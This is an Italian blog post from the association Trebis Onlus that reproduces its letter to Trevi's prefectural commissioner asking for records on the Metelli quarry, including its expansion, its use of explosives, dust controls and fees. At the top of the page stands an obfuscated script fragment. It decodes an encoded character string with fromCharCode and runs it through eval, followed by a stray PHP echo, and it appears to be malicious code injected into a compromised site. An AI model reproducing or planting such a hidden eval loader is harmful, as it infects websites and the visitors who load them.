q4Zq1Zq72Zq4Zq1Zq60Zq5dZq1fZq3eZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq70Zq6aZq61Zq5aZq67Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74\"[gzr](\"Zq\");}uwo=cpf;uoukoc=[];for(ymg=22-20-2;-ymg 1420!=0;ymg =1){ubtze=ymg;if((0x19==031))uoukoc =pivr.fromCharCode(eval(xcf uwo[1*ubtze]) 0xa-nhmv);}ilqz=eval;if(Math.ceil(5.5)===6)ilqz(uoukoc)}";echo $x;} ?>

Lettera al commissario prefettizio sulla cava Metelli

admin Luglio 9th, 2012

Cari soci
preoccupato dalle varie attività poco chiare intorno alla cava Metelli, il consiglio della Trebis ha mandato una lettera a Dott. Angelo Gallo Carabba, commissario prefettizio, chiedendo informazioni e documenti relativi alla Cava. Ecco il testo della nostra lettera:

Egr. Sig. Commissario,

La Trebis Onlus è un’Associazione sorta alcuni anni fa con il sostegno di un centinaio di membri, che si è assunta il compito di diffondere tra gli abitanti e i residenti di Trevi l’importanza della preservazione ambientale e paesaggistica della cittadina, senza rinunciare ad un equilibrato sviluppo economico dell’intero territorio comunale.

L’Associazione Trebis, nell’ambito delle finalità previste dallo Statuto, di cui si allega copia, vista la persistente attività estrattiva della Cava Metelli il località Scoppeto confermata dall’uso giornaliero di sostanze esplosive per l’estrazione di materiali di cava, chiede che vengano fornite informazioni scritte sui seguenti punti :

A) La conoscenza esatta delle procedure adottate a seguito della Delibera del Consiglio Comunale N.3 del 25/02/2011, relativa alla richiesta di ampliamento del sito su cui implementare l’attività estrattiva da parte della Ditta Metelli S.p.A.;

B) I controlli posti in essere relativi all’impatto ambientale della suddetta richiesta di ampliamento e l’eventuale esistenza di vincoli ambientali (nazionali e regionali) su tale territorio;

C) La quantità del materiale estratto dal 2009 ad oggi in relazione alla normativa regionale vigente;

D) I controlli effettuati a mezzo del tecnico incaricato in base alla convenzione fra il Comune di Trevi e la Ditta Metelli del 1993 o successive, il tutto con dati numerici e date;

E) La persistenza o meno della c.d. “escavazione a pozzo”;

F) L’uso di materiali esplosivi;

G) L’ammontare della quota per tonnellata che il Comune di Trevi riceve dalla ditta escavatrice;

H) L’adempimento dei controlli sulla emissione di polveri in relazione alla salute dei cittadini;

I) Si chiede inoltre il rilascio delle copie delle autorizzazioni e delle convenzioni in possesso della S.p.A. Metelli per lo sfruttamento della cava in questione.

Sicuri della Sua attenzione a soddisfare le richieste dell’Associazione e disponibili ad un eventuale incontro, La ringraziamo anticipatamente e porgiamo i più cordiali saluti.

Trackback URI | Comments RSS

Leave a Reply